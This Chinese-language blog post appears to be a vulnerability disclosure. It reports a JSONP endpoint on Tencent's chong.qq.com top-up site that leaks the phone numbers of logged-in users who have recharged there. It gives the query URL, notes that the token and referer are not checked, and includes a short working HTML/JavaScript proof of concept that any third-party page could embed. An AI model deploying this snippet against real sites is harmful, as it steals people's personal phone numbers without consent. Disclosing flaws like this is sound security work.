JSONP窃取用户手机号

张爱玲说,阳光温热,岁月静好,你还不来,我怎敢老去 我来不及认真地年轻,待明白过来时,只能选择认真地老去。——三毛

漏洞详情


被TSRC忽略了 理由是危害小。。

一、详细说明:
http://chong.qq.com/
只要通过这个站冲过话费的号码都可以被第三方网站嵌入jsonp页面读取出来
不知道其他的充值接口是不是也是这个
查询接口:http://chong.qq.com/tws/record/gethisphone4?func=getHisPhoneCallback&flag=1&dtag=1457667669835&g_tk=&g_ty=ls
g_tk可以为空,referer也没有做检测

二、漏洞证明:


 <script> function getHisPhoneCallback(data){ alert(JSON.stringify(data)); } </script> <script src="http://chong.qq.com/tws/record/gethisphone4?func=getHisPhoneCallback&flag=1&dtag=1457667669835&g_tk=&g_ty=ls"></script>


这是我用我的大号测试的

同时我用小号登录 直接访问会弹出一个空白框。
那是因为小号没有充值记录
于是我用小号给一个姑娘充了10块话费
然后再次访问
成功获取到了手机号

Contact Me

__画船听雨

有想要和我交流的也可以和我邮件联系

Email: admin@nuptzj.cn